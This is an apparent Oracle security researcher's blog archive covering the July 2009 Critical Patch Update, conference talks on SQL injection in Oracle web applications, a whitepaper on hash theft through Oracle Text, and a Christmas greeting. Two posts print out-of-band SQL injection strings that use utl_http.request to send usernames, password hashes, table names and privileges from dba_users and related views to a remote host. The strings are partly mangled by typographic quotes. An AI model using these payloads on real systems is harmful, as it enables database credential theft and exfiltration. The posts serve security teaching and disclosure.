Archive for the ‘Allgemein’ Category

Oracle CPU July 2009 published

Mittwoch, Juli 15th, 2009

Yesterday night Oracle released the July 2009 CPU. This CPU contains 30 fixes for several Oracle products. 10 security issues are fixed in the Oracle Database Server.As always the usual suspects (Esteban, David, Joxean, Alexandr, Dennis) and a few others reported issues in Oracle products.

The 3 most critical bugs this time are related to the TNS Listener and one of the bugs be exploited without authentication.These issues CVE-2009-1020, CVE-2009-1019, CVE-2009-1963 are rated with CVSS 9 (for Windows), 7.5 for Unix.
Oracle has also fixed 3 of my findings in the database (3 out of 10 :-))

  • SQL Injection in DBMS_EXPORT_EXTENSION (previously fixed in April 2006)
  • Information Disclosure (Password Hash) in Database Vault
  • Information Disclosure (Password Hash) in Audit Vault

More details will be published within the next few days. The updates for our Oracle database scanner Repscan (free trial available) will be released within the next 2 days.

Presentation from Confidence 2009 available

Samstag, Mai 16th, 2009

I just uploaded the presentation „SQL Injection in Oracle Webapps“ to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this  SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.‚ or 1=((select


username||’=’||password) from dba_users)))+((select


owner||’=’||table_name) from dba_tables))+((select


owner||’=’||table_name||’=’||column_name)) from dba_users))

+((select sum(length(utl_http.request(‚http://’||grantee||’=’||granted_role) from




grantable) from dba_tab_privs)))–

Whitepaper: Penetration from Application down to OS

Montag, April 20th, 2009

Few hours ago I saw that Paul Wright posted an entry on his blog Oracle Forensics about a whitepaper „Penetration from Application down to OS“ from Alexandr Polyakov.

Alexandr explains in the well written document how to steal the Windows hashes using a fake SMB Server with low privileges (CONNECT, RESOURCE) via Oracle Text. On a previous blog entry in February „What is more dangerous? ALTER SESSION or OS Access?“  I showed how to read files via Oracle Text and Alexandr used a really smart approach to exploit this issue.

Well done Alexandr…

IT Underground Prague – Presentation

Freitag, März 27th, 2009

Just back from the IT Underground 2009 in Prague.

I met several smart security consultants and some of my customers from different countries in Europe (Belgium, Poland, Germany, UK, …) and had a lot of interesting talks.

I gave a presentation concerning SQL Injection in web applications with Oracle backend databases.

Here a short example from the presentation:

The following (vulnerable) URL is sending all usernames/passwords, all accessible tables, tables and column, roles and privileges in a single SQL statement to a remote system. This can be done with a simple trick. Just use sum(length(utl_http.request(()))).‚ or 1=((select sum(length(utl_http.request(‚’username||’=’||password) from dba_users)))+((select sum(length(utl_http.request(‚’owner||’=’||table_name) from dba_tables)))+((select sum(length(utl_http.request(‚’owner||’=’||table_name||’=’||column_name)) from dba_users))+((select sum(length(utl_http.request(‚’grantee||’=’||granted_role) from dba_role_privs)))+((select sum(length(utl_http.request(‚’grantee||’=’||owner||’=’||table_name||’=’||privilege||’=’||grantable) from dba_tab_privs)))–

More details in the presentation.

Merry Christmas

Mittwoch, Dezember 24th, 2008

 Dear ReaderI wish you (and your families) a merry Christmas and a happy new year.Merry ChristmasP.S.: This lovely baby is our daughter Anna. Already 10 months old…